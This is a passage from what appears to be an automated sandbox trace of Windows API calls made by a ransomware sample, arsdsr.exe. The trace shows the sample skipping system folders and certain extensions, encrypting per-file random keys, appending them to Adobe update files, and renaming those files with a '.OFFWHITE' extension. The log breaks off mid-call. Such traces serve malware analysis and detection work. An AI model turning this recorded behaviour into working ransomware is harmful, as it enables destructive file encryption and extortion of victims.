nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x540052, dwReserved1=0x295dcf0, cFileName="Security", cAlternateFileName="")) returned 0 [0140.301] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0140.301] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 0 [0140.301] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0140.301] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="10.0", cAlternateFileName="")) returned 0 [0140.301] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0140.301] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="ARM", cAlternateFileName="")) returned 1 [0140.301] lstrcmpiW (lpString1="ARM", lpString2=".") returned 1 [0140.301] lstrcmpiW (lpString1="ARM", lpString2="..") returned 1 [0140.301] lstrcmpiW (lpString1="ARM", lpString2="...") returned 1 [0140.301] lstrcmpiW (lpString1="ARM", lpString2="windows") returned -1 [0140.301] lstrcmpiW (lpString1="ARM", lpString2="$recycle.bin") returned 1 [0140.301] lstrcmpiW (lpString1="ARM", lpString2="rsa") returned -1 [0140.301] lstrcmpiW (lpString1="ARM", lpString2="ntuser.dat") returned -1 [0140.302] lstrcmpiW (lpString1="ARM", lpString2="programdata") returned -1 [0140.302] lstrcmpiW (lpString1="ARM", lpString2="appdata") returned 1 [0140.302] lstrcmpiW (lpString1="ARM", lpString2="program files") returned -1 [0140.302] lstrcmpiW (lpString1="ARM", lpString2="program files (x86)") returned -1 [0140.302] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Adobe\\" | out: lpString1="C:/Users\\All Users\\Adobe\\") returned="C:/Users\\All Users\\Adobe\\" [0140.302] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\", lpString2="ARM" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM") returned="C:/Users\\All Users\\Adobe\\ARM" [0140.302] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\") returned="C:/Users\\All Users\\Adobe\\ARM\\" [0140.302] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Adobe\\ARM\\" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\") returned="C:/Users\\All Users\\Adobe\\ARM\\" [0140.302] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\*.*") returned="C:/Users\\All Users\\Adobe\\ARM\\*.*" [0140.302] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Adobe\\ARM\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0140.331] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0140.331] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0140.331] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0140.331] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0140.331] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2=".") returned 1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="..") returned 1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="...") returned 1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="windows") returned -1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="$recycle.bin") returned 1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="rsa") returned -1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="ntuser.dat") returned 1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="programdata") returned 1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="appdata") returned 1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="program files") returned 1 [0140.331] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="program files (x86)") returned 1 [0140.331] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Adobe\\ARM\\" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\") returned="C:/Users\\All Users\\Adobe\\ARM\\" [0140.331] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\", lpString2="Reader_10.0.0" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0" [0140.332] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\" [0140.332] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\" [0140.332] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0140.332] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0140.363] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0140.363] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0140.365] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0140.365] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0140.365] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x7e186d00, ftLastWriteTime.dwHighDateTime=0x1cfb543, nFileSizeHigh=0x0, nFileSizeLow=0x3d800, dwReserved0=0x420040, dwReserved1=0x295e370, cFileName="AdbeRdrSecUpd10111.msp", cAlternateFileName="ADBERD~2.MSP")) returned 1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2=".") returned 1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="..") returned 1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="...") returned 1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="windows") returned -1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="$recycle.bin") returned 1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="rsa") returned -1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="ntuser.dat") returned -1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="programdata") returned -1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="appdata") returned -1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="program files") returned -1 [0140.365] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="program files (x86)") returned -1 [0140.365] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\" [0140.365] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="AdbeRdrSecUpd10111.msp" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" [0140.365] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.365] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.365] PathFindExtensionW (pszPath="AdbeRdrSecUpd10111.msp") returned=".msp" [0140.365] lstrcmpiW (lpString1=".msp", lpString2=".exe") returned 1 [0140.365] lstrcmpiW (lpString1=".msp", lpString2=".log") returned 1 [0140.365] lstrcmpiW (lpString1=".msp", lpString2=".cab") returned 1 [0140.365] lstrcmpiW (lpString1=".msp", lpString2=".cmd") returned 1 [0140.365] lstrcmpiW (lpString1=".msp", lpString2=".com") returned 1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".cpl") returned 1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".ini") returned 1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".url") returned -1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".ttf") returned -1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".mp3") returned 1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".pif") returned -1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".mp4") returned 1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".OFFWHITE") returned -1 [0140.366] lstrcmpiW (lpString1=".msp", lpString2=".msi") returned 1 [0140.366] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0140.366] GetProcessHeap () returned 0x500000 [0140.366] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5221e0 [0140.366] CreateFileW (lpFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0140.382] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=251904) returned 1 [0140.383] GetProcessHeap () returned 0x500000 [0140.383] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.383] GetProcessHeap () returned 0x500000 [0140.383] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.383] GetProcessHeap () returned 0x500000 [0140.383] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.383] GetProcessHeap () returned 0x500000 [0140.383] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.383] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.383] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.383] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.383] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.383] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.383] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.383] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.383] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.383] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295d610*=0x100) returned 1 [0140.384] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.384] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.384] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295d60c*=0x100) returned 1 [0140.384] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x3d800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.384] SetLastError (dwErrCode=0x0) [0140.384] WriteFile (in: hFile=0x214, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0140.390] GetLastError () returned 0x0 [0140.390] GetLastError () returned 0x0 [0140.390] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x3d900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.391] WriteFile (in: hFile=0x214, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0140.391] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x3da00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.391] WriteFile (in: hFile=0x214, lpBuffer=0x5221e0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5221e0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0140.391] GetProcessHeap () returned 0x500000 [0140.391] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3d800) returned 0x55b7c0 [0140.391] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.391] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x3d800, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x3d800, lpOverlapped=0x0) returned 1 [0140.405] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.406] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x3d800, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x3d800, lpOverlapped=0x0) returned 1 [0140.407] GetProcessHeap () returned 0x500000 [0140.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0140.407] CloseHandle (hObject=0x214) returned 1 [0140.414] GetProcessHeap () returned 0x500000 [0140.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0140.414] GetProcessHeap () returned 0x500000 [0140.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0140.414] GetProcessHeap () returned 0x500000 [0140.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0140.414] GetProcessHeap () returned 0x500000 [0140.414] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0140.414] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" [0140.414] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.OFFWHITE") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.OFFWHITE" [0140.414] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), lpNewFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.OFFWHITE" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.offwhite")) returned 1 [0140.415] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0x420040, dwReserved1=0x295e370, cFileName="AdbeRdrUpd10110_MUI.msp", cAlternateFileName="ADBERD~1.MSP")) returned 1 [0140.415] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2=".") returned 1 [0140.415] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="..") returned 1 [0140.415] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="...") returned 1 [0140.415] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="windows") returned -1 [0140.415] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="$recycle.bin") returned 1 [0140.415] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="rsa") returned -1 [0140.415] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="ntuser.dat") returned -1 [0140.415] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="programdata") returned -1 [0140.416] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="appdata") returned -1 [0140.416] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="program files") returned -1 [0140.416] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="program files (x86)") returned -1 [0140.416] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\" [0140.416] lstrcatW (in: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="AdbeRdrUpd10110_MUI.msp" | out: lpString1="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" [0140.416] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.416] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.416] PathFindExtensionW (pszPath="AdbeRdrUpd10110_MUI.msp") returned=".msp" [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".exe") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".log") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".cab") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".cmd") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".com") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".cpl") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".ini") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".url") returned -1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".ttf") returned -1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".mp3") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".pif") returned -1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".mp4") returned 1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".OFFWHITE") returned -1 [0140.416] lstrcmpiW (lpString1=".msp", lpString2=".msi") returned 1 [0140.416] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0140.416] GetProcessHeap () returned 0x500000 [0140.416] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5221f0 [0140.416] CreateFileW (lpFileName="C:/Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0140.425] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=17707008) returned 1 [0140.425] GetProcessHeap () returned 0x500000 [0140.425] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0140.425] GetProcessHeap () returned 0x500000 [0140.425] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0140.425] GetProcessHeap () returned 0x500000 [0140.425] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0140.425] GetProcessHeap () returned 0x500000 [0140.425] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0140.425] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.425] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.425] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0140.425] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.425] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.425] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0140.425] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.425] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.426] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295d610*=0x100) returned 1 [0140.426] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0140.426] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0140.426] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295d60c*=0x100) returned 1 [0140.426] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x10e3000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.426] SetLastError (dwErrCode=0x0) [0140.426] WriteFile (in: hFile=0x214, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0140.427] GetLastError () returned 0x0 [0140.428] GetLastError () returned 0x0 [0140.428] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x10e3100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 